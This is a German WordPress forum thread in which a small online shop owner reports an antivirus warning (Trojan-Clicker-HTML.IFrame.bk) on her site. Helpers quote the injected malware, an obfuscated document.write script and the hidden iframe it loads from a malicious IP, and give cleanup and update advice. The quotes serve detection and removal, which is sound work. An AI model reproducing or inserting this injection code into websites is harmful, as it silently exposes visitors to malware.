Trojaner auf Website

  • Liebes Wordpress-Forum,

    um es gleich vorweg zu sagen: ich bin absoluter Computer-Laie! Also bitte nachsichtig sein mit meinen Formulierungen!

    Ich betreibe als kleiner Versandhandel zwei Websites!
    Als ich gestern mit Wordpress zwei neue Bilddateien in meiner einen Website einfügen wollte und dieses dann unter der Vorschau-Funktion kontrollieren wollte, bekam ich meine Webite nicht mehr zu sehen. Anstatt dessen der Hinweis: Website gesperrt!
    Und: Trojan-Clicker-HTML.IFrame.bk

    Ich habe seitdem keinen Zugriff mehr auf meine Seite!
    Mein Mann und auch mein Webdesigner hingegegen, können die Seite von ihrem Rechner aus noch öffnen....

    Ein Viruscheck meines Rechners ergab keinen Virus! Auch die Bilddateien habe ich nochmal durchgeprüft! Ohne Ergebnis!

    Was kann ich machen? Wer hat da Erfahrungen?
    Wie konnte so ein Virus auf meine Website gelangen?

    Soll ich die Website sperren lassen, um meine Kunden nicht zu gefährden?

    Wer mutig ist, kann sich die Website gerne unter: taschen-aus-der-schweiz.de | Taschen, Militaerdecken und Gamellen aus der Schweiz im Arche Nova Shop anschauen.

    Über einen Rat aus diesem Forum wäre ich sehr dankbar!

    Herzliche Grüße aus Norddeutschland!
    Svenja Furken

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ja , hast einen Einbruch im Server gehabt. Der/die Hacker haben sich in mindestens einer deiner php Dateien vergriffen und einen Trojaner Code eingeschleust, der ganz unten auf der Seite zu finden ist ist.

    Code
    <!-- ~ --><!-- Nerzul --><script type="text/javascript">
    document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
    </script><!-- Nerzul --><!-- ~ -->

    Dieser Javascript erzeugt dynamisch den iframe, den bestimmte Virensucher sofort erkennen und ankreiden. Da müssen schleunigst deine PHP Dateien untersucht und bereinigt werden.

    Allerdings kann man so fernschriftlich nicht viel machen, maximal weiter Tips geben.

    PS: Den daraus resultierenden iframe kann ich hier leider nicht einkleben, sonst wird dieser Forumsthread von Virensuchern blockiert.

  • Hatte ähnliches Problem mal mit nem anderen CMS. Durchsuche mal die Dateien nach folgendem Code:

    Code
    <iframe src="http://58.65.235.41/llll/stds/go.php?sid=1" style="visibility: hidden; position: absolute;" height="1" width="1">
    </iframe>

    Diesen solltest Du dann löschen (vorausgesetzt er lässt sich finden). Danach sind unbedingt alle Zugangsdaten zu ändern (WP Installation, Datenbank, FTP Server). Damit hast Du dann schonmal nen Schritt in die richtige Richtung gemacht. Kann Dir leider nicht versprechen, dass Du den Code irgendwo findest. Könnte auch irgendwo in der Datenbank stecken. Auf jeden Fall auch mal die Verzeichnisrechte überprüfen. Infos dazu solltest Du eigentlich hier im Forum finden. Sollten meine Tipps nicht helfen oder falsch sein, wird einer der Moderaten oder der anderen User Dir sicherlich weiterhelfen können. Das wären zumindest die Schritte, die ich als erstes einleiten würde...

    PS: Oft findet sich die Ursache für solche Trojaner oder Viren auch in unsauber programmierten Plugins. Eventuell auch mal die Dateien durchsuchen.

    EDIT: Da war jemand schneller ;-) Ich sollte mir abgewöhnen so viel zu schreiben :-D

  • Nach Seiteninhalt zu urteilen

    Code
    <a href="http://wordpress.org" title="Wordpress"><strong>Wordpress</strong> 2.3.2<br /> </a>

    und wegen des fehlenden X-Pingback Headers ist das eine WP 2.3.2 Version bzw 2.3.3 höchstens. Die 2.3.2 ist aber hochgradig anfällig und muss ersetzt werden, sonst passiert das immer wieder.

  • Ich hatte genau den gleichen in 2 WP-Installationen (unter 2.5.1). Er sitzt in der index.php im Rootverzeichnis. Während die Seite lädt, sieht man unten in der Statusleiste, dass versucht wird, ein 'xanjan.cn' zu laden.

  • Ich hatte genau den gleichen in 2 WP-Installationen (unter 2.5.1). Er sitzt in der index.php im Rootverzeichnis. Während die Seite lädt, sieht man unten in der Statusleiste, dass versucht wird, ein 'xanjan.cn' zu laden.

    Ist wäre wichtig zu wissen, ob das schon vor 2.5.1 drin war und du es nur durch ein Update quasi übernommen hast oder ob er es geschafft hat, sich in eine pure 2.5.1 direkt einzunisten. Das ist ein himmelweiter Unterschied.

  • Danke schon mal!

    Liebe Forum Mitglieder!

    Vielen Dank schon mal für die schnellen (damit hätte ich nie gerechnet!!!!) Antworten!
    Wir versuchen nun zusammen mit unserer Internetagentur das Problem zu beheben!

    Ich habe eben auch schon den Hersteller unserer Antiviren-Software konatktiert und nachgefragt, seit wann das Programm den Virus erkennt!
    Vielleicht schlummert der ja schon längere Zeit. Das würde ebventuell auch den drastischen Umsatzrückgang der letzten Wochen erklären....

    Nun noch ein paar Fragen an die Fachkompetenz:
    Soll man nun eigentlich Anzeige gegen Unbekannt erheben?
    Eigentlich ist doch das Hacken ein Straftatbestand!

    Müssen wir nun die Site bis zur Fehlerbehebung deaktivieren, um Schäden bei den Kunden zu verhindern?

    Viele herzliche Grüße aus Norddeutschland!

    Svenja Furken

  • Ist wäre wichtig zu wissen, ob das schon vor 2.5.1 drin war und du es nur durch ein Update quasi übernommen hast oder ob er es geschafft hat, sich in eine pure 2.5.1 direkt einzunisten. Das ist ein himmelweiter Unterschied.


    Ich habe ihn nicht übernommen, er ist erst nach dem Update aufgetaucht.

  • Ich habe ihn nicht übernommen, er ist erst nach dem Update aufgetaucht.


    In diesem Falle wäre es sinnvoll, rauszufinden, ob es an WP selbst liegen kann (was Horror wäre!) oder an einem der Plugins, das du benutzt. Wäre es möglich eine Pluginliste zu bekommen (am Besten mit Download Links und von mir aus auch als PM), damit ich das mal analysieren kann ?
    Ich möchte ungern ein "offenes Scheunentor" in der WP2.5.1 haben!


    Müssen wir nun die Site bis zur Fehlerbehebung deaktivieren, um Schäden bei den Kunden zu verhindern?

    Sollte man eigentlich. Es hat ja nicht nur den Nachteil, das potentielle Kunden abgeschreckt und Bestandskunden schockiert sind, wenn deren Virensucher aufschreit, sondern Google stellt irgendwann deine Seite als potentiell gefährlich in der Suchanfrage dar! Das geht dann auch nicht mehr von allein weg, da mußt du Google kontaktieren.

  • Wäre es möglich eine Pluginliste zu bekommen (am Besten mit Download Links und von mir aus auch als PM), damit ich das mal analysieren kann ?


    Plugins sind so gut wie keine installiert: Semmelstatz, zu dem es momentan wohl keinen Downloadlink gibt, und Shutter Reloaded.


    Sollte man eigentlich. Es hat ja nicht nur den Nachteil, das potentielle Kunden abgeschreckt und Bestandskunden schockiert sind, wenn deren Virensucher aufschreit, sondern Google stellt irgendwann deine Seite als potentiell gefährlich in der Suchanfrage dar! Das geht dann auch nicht mehr von allein weg, da mußt du Google kontaktieren.


    Ich würde schnellstens den Code aus der index.php löschen!

  • Trojaner entfernt!

    Liebe Forum-Mitglieder!

    Wir haben es geschafft! Dank Eurer genialen Hilfe, konnte der Trojaner entfernt werden!!!!!
    Ganz ganz herzlichen Dank!!!!
    Auch von meinem Webdesiger ein großes Dankeschön und viele Grüße!

    Nun wollen wir noch anhand der "Server Logs" (oder so ähnlich?) feststellen, ob wir den Übeltäter dingfest machen können. Einen Versuch ist es wert und ich würde dann auch rechtliche Schritte gegen diesen einleiten.

    Falls wir doch nicht gehackt wurden, wollen wir weitersuchen, woran es noch gelegen haben könnte.
    Wir werden Euch auf alle Fälle informieren!

    Ganz herzliche Grüße
    Svenja Furken

  • Ne wirkliche Idee habe ich nicht, aber benutzt Du Gravatare oder lässt Deine User gar Avatare hochladen, z. B. durch ein Forum oder so?

  • Hat denn irgendjemand noch eine Idee, wie das Ding dahin kam und was man tun kann, damit das nicht wieder passiert?

    Ich hab mir das Plugin mal runtergeladen, das du als Paged Comments auf deinen Seiten beschreibst.
    Ich hab es nur überflogen (weil schon sehr spät/oder früh ist?) aber das scheint mir Potential für DB Injection zu haben:

    Plugin Code:

    WP Code:

    Code
    function url_to_postid($url) {
        global $wp_rewrite;
    ...
                $query = new WP_Query($query);
    }

    Ich bin mir nicht sicher, ob diese WP Methode bereits geprüfte URI's haben will (schau ich mir noch später an). Wenn ja, dann schaufelt da das Plugin eine nicht vollständig geprüfte URI durch, die eine SQL Injection auslösen könnte. Ich geh erstmal schlafen, falls sich das jemand näher ansehen will: http://www.keyvan.net/files/paged-comments/paged-comments-2.6.4-(2007-07-31).zip

  • Wäre super wenn Du es schaffen würdest, Dir das mal genauer anzusehen. Erst gestern habe ich dieses Plugin für die Realisierung eines Gästebuchs eingesetzt. :-|

    Nachtrag zu meinem vorherigen Beitrag: Beim PHPKit (seinerzeit auch bekannt als eine große Sicherheitslücke) war es möglich, durch modifizierte Avatare (unter Punkt 5) Schadcode einzuschleusen. Mich hat es wie gesagt damals selbst getroffen und es lief genau wie hier in einem vorherigen Posting beschrieben. Wäre es denkbar, dass sowas auch bei WordPress passieren könnte?

  • Ich hab mir das Plugin mal runtergeladen, das du als Paged Comments auf deinen Seiten beschreibst.
    Ich hab es nur überflogen (weil schon sehr spät/oder früh ist?) aber das scheint mir Potential für DB Injection zu haben


    Es ist allerdings so, dass die Seiten, auf denen ich Paged Comments einsetze, alle nicht befallen waren, auch mein Testblog, den ich hier in meiner Signatur habe, nicht. Es ist (bislang) auch keine Seite betroffen, bei der WP in einem Unterverzeichnis läuft, sondern nur Seiten, in denen es im Root installiert ist.
    Gravatare nutze ich nicht.

  • Es ist allerdings so, dass die Seiten, auf denen ich Paged Comments einsetze, alle nicht befallen waren, auch mein Testblog, den ich hier in meiner Signatur habe, nicht. Es ist (bislang) auch keine Seite betroffen, bei der WP in einem Unterverzeichnis läuft, sondern nur Seiten, in denen es im Root installiert ist.
    Gravatare nutze ich nicht.

    ja das geht auch leichter...

    und deswegen, weil man wo eine Schwachstelle hat, muss ein *zufällig durchs WWW* jagender Angreifer einem noch nicht gefunden haben.


    informier den Pluginautoren, das ist immer die erste Anlaufstelle

    lg

  • ja das geht auch leichter...

    und deswegen, weil man wo eine Schwachstelle hat, muss ein *zufällig durchs WWW* jagender Angreifer einem noch nicht gefunden haben.

    informier den Pluginautoren, das ist immer die erste Anlaufstelle

    lg


    Was meinst du denn, welchen Pluginautor?

  • Was meinst du denn, welchen Pluginautor?

    page comments - wenn ich richtig las, nimmst Du dies, codestyling nimmt an da sei ein Lücke

    dann soll der Pluginautor dies kontrollieren-auch auf Verdacht hin

    lg

  • Monika, nein, wie ich oben geschrieben habe, ist auf einer der betroffenen Seiten lediglich Semmelstatz und Shutter Reloaded installiert, und das Plugin, über das codestyling schreibt, ist auf der zweiten meiner betroffenen Seiten ebenfalls nicht installiert. Auf dieser zweiten Seite sind Semmelstatz und Shutter Reloaded übrigens nicht installiert. Also sehe ich pluginmäßig keine Zusammenhänge.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!